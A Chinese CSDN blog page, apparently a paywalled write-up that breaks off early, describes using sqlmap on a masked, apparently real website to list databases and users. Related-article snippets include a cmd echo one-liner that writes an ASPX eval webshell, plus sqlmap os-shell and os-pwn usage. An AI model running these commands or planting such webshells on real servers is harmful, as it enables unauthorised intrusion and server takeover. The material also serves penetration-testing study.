cmd echo写入shell_记一次渗透过程中用sqlmap写shell

最新推荐文章于 2024-05-01 12:30:53 发布
最新推荐文章于 2024-05-01 12:30:53 发布
阅读量358 收藏 1
点赞数
文章标签: cmd echo写入shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39620578/article/details/111583002
版权

第一步

拿到注入点:

http://xxxxx.com/zxxxxx.aspx?zid=16

为了防止被爆菊被和谐,这里的网址采取硬核马赛克措施 – –

sqlmap.py –u “http://xxxxx.com/zpDetails.aspx?zid=16” –dbs

--dbs查了一下数据库

8a489b87783066d0d30c769ceddc5b18.png

估计是一个小站群,数据库不少,然后列一下数据库的管理员账号

sqlmap.py –u “http://xxxxx.com/zpxxxxils.aspx?zid=16” –users

2b4fd99f2e39da5cc5578be199d8817e.png

这里看到了一个sa用户,嗯,有亮点!不过暂时也用不到,后面讲到提权的时候会提到sa

最低0.47元/天 解锁文章
weixin_39620578
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cmd echo写入shell_学习笔-命令执行及花式bypassshell
weixin_30801745的博客
01-26 1721
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
SQLMAP是一款开源的自动化渗透测试工具,专门用于检测和利用SQL注入漏洞。它以其高效、智能化的特点,在网络安全领域中备受青睐。SQL注入攻击是黑客利用应用程序处理用户输入时的疏忽,将恶意的SQL代码注入到查询...
Shell 中使用 echo 将数据写入文件
热门推荐
HeatDeath的博客
05-24 7万+
Shell脚本入门(十二) - 将数据写入文件 Linux学习笔——如何使用echo指令向文件写入内容 今天我们来看一下怎样将数据写入文件中,还得前面输出信息使用的echo命令吗? 输出到文件同样使用这个命令: 1. 写入文件 示例: [java] view plain copy...
SQL 注入神器:SQLMap 参数详解
最新发布
Flag少侠的博客
05-01 2026
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
常见操作系统命令注入思路
牛叫兽的测试学习和分享
12-16 6282
渗透测试技能:命令注入思路总结
一次sql注入艰难上传马过程
weixin_46079186的博客
01-26 4877
先说一下我的思路,得到一个sql注入点,sqlmap 进行os-shell ,然后想上传webshell,首先进行cs 上线,发现无法上线cs,原因是目标系统windwos 2003 没有powershell,换一个思路,先找到web路径,然后上传webshell。找到web路径之后,发现路径带中文,os-shell写入webshell 的时候就会提示没有这个路径,然后进行一个手注发现上传成功 发现注入点,使用sqlmap进行os-shell 尝试上线cs,为了更好的后续操作(失败) 执行powersh
关于--os-shellwebshell
qq_40806924的博客
07-30 2027
1.首先需要知道目录(web目录) 2.得是DBA权限 寻找web目录 dir C:\ /s /b | find “xLogin.aspx” 这里需要注意转义^ echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx' os-shell 无法执行的时候,权限低的时候可以尝试 sql-shellwebshell select
命令注入实操与总结
qq_51582652的博客
03-24 2015
这个内容是为了了解命令注入攻击的过程,掌握思路。一次DVWA靶场的通关,commix-testbed靶场的实验。
sqlmap渗透工具
07-06
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员有效地发现和利用网站应用程序中的数据库安全漏洞。在Python环境中运行,SQLMap提供了一系列...
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器的潜在漏洞。在这个"sqlmap自动扫描器.zip"压缩包中,包含...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
在继续之前需要提醒一下,如果读者也想要按本文的步骤进行,需要在NOWASPMutillidae环境搭建好之后先注册一个NOWASPMutillidae帐号。本文演示从web界面注入SQL命令的方法,但不会直接连接到数据库,而是想办法使后端...
一份SQLmap 使用手册小结(一)1
08-03
7. **命令执行**:`--os-cmd "cmd"`执行操作系统命令,例如`cd C:/`,而`--os-shell`则提供一个操作系统命令行接口。 8. **其他高级用法**: - `-r 1.txt`:处理POST数据提交的请求。 - `-l log.txt`:分析代理...
sqlmap中的--sql-shell
qq_45751902的博客
10-25 7629
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出。2、secure_file_priv 的值非NULL或包含了导出的绝对路径。outfile 和 dumpfile的路径不支持hex,必须有引号包裹。4、mysql连接用户有FILE权限/ROOT用户或ROOT权限。Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。3、mysql服务有对网站可访问路径的权限。5、GPC关闭//未对闭合用的引号转义。1、网站可访问路径的绝对路径。
SQLmap使用指南(包含使用SQLmap获取shell)
北冥同学的成长记录笔记
07-16 4098
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
shellecho
weixin_43084908的博客
08-28 874
1、 echo [选项] [输出内容]: -e:支持反斜线控制的字符转换 -n 不输出行尾的换行符 -e 允许对下面列出的加反斜线转义的字符进行解释. -E 禁止对在STRINGs中的那些序列进行解释. \a 发出警告声; \b 删除前一个字符; \c 最后不加上换行符号; \f 换行但光标仍旧停留在原来的位置; \n 换行且光标移至行首; \t 制表符;插入tab; \r...
【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
记录并分享学习安全的知识点..
03-15 1383
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap的基本命令使用
Leonardo DiCaprio‘s spring
03-24 5万+
本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                 sqlmap.py -u 登
sqlmap命令详解
Pitbull2014的博客
12-20 1121
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmapshell
06-06
### 回答1: SQLMap可以用来shell,具体步骤如下: 1. 找到目标网站的注入点,使用SQLMap进行注入测试。 2. 在注入点处使用SQLMap的“-os-shell”参数,让SQLMap生成一个交互式shell。 3. 使用SQLMap的“-os-pwn”参数,让SQLMap生成一个反弹shell,可以在目标服务器上执行命令。 4. 使用SQLMap的“-os-cmd”参数,让SQLMap在目标服务器上执行命令。 需要注意的是,使用SQLMapshell需要有一定的技术基础和实践经验,否则可能会造成安全风险。建议在合法授权的情况下进行测试和实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值